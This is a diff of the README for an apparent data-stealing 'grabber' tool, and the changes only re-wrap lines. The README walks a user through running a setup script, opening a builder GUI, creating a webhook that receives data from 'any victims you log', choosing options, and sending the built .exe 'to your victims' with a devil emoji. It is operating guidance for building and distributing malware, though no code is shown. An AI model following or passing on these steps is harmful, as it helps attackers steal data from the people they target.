Entity378/Bone-Skewer-Grabber/README.md

 ### 2. Open The setup.bat File:

 ```
 You dont need to install any modules opening the install them for you.
-Then you can open the builder.py file which will
-open the gui.
+Then you can open the builder.py file which willopen the gui.
 ```
 ### 3. Create A Webhook:

 ```
 This webhook will be sent any victims you log so don't delete it once it's made.
-Once you've created one paste it
-into the box which asks for your webhook.
+Once you've created one paste it into the box which asks for your webhook.
 ```
 ### 4. Configurable Options:

 ```
-Now once you've done that you can tick on the options that you want enabled and anything you don't understand you can go
+Now once you've done that you can tick on the options that you want enabled
-to the documentation where each option is explained.
+and anything you don't understand you can go to the documentation where each option is explained.
 ```
 ### 5. What Now?

 ```
-The .exe file will appear in the same folder where all the other files are with the name you set it as and you can now send
+The .exe file will appear in the same folder where all the other files are with the name you set it
-this to your victims.😈
+as and you can now send this to your victims.😈
 ```

 <hr  style="border-radius: 2%; margin-top: 60px; margin-bottom: 60px;"  noshade=""  size="20"  width="100%">